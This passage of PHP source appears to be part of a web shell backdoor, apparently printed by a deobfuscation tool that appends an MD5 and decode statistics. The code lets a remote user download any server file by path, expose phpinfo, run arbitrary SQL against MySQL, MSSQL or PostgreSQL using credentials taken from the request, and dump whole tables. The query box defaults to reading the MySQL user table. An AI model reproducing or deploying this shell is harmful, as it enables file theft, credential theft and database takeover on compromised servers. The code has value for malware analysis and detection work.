while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res)))
$this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){
$this->columns = @array_keys($this->rows[0]);
return 1;
}
break;
}
return 0;
}
function dump($table) {
if(empty($table))
return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db){
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1)
return 0;
if(!$this->get_result())
return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++){
foreach($this->rows[$i] as $k=>$v){
$this->rows[$i][$k] = @mysql_real_escape_string($v);
}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++)
foreach($this->rows[$i] as $k=>$v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1)
return 0;
if(!$this->get_result())
return 0;
for($i=0;$i<$this->num_rows;$i++) {
foreach($this->rows[$i] as $k=>$v) {
$this->rows[$i][$k] = @addslashes($v);
}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close() {
switch($this->db) {
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows() {
switch($this->db) {
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) {
if($file=@fopen($_POST['d_name'],"r")){
$filedump = @fread($file,@filesize($_POST['d_name']));
@fclose($file);
} else if ($file=readzlib($_POST['d_name'])) {
$filedump = $file;
} else {
err(1,$_POST['d_name']);
$_POST['cmd']="";
}
if(isset($_POST['cmd'])) {
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) {
header('Content-Encoding: ' . $content_encoding);
}
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) {
echo @phpinfo();
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") {
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect())
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else {
if(!empty($sql->base)&&!$sql->select_db())
echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else {
foreach($querys as $num=>$query) {
if(strlen($query)>5) {
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query)) {
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result()) {
echo "<table width=100%>";
foreach($sql->columns as $k=>$v)
$sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++) {
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."
?>
// --->
Function Calls
| None |
Stats
| MD5 | 261d8a60d321ec4b4156b32621031d8f |
| Eval Count | 0 |
| Decode Time | 155 ms |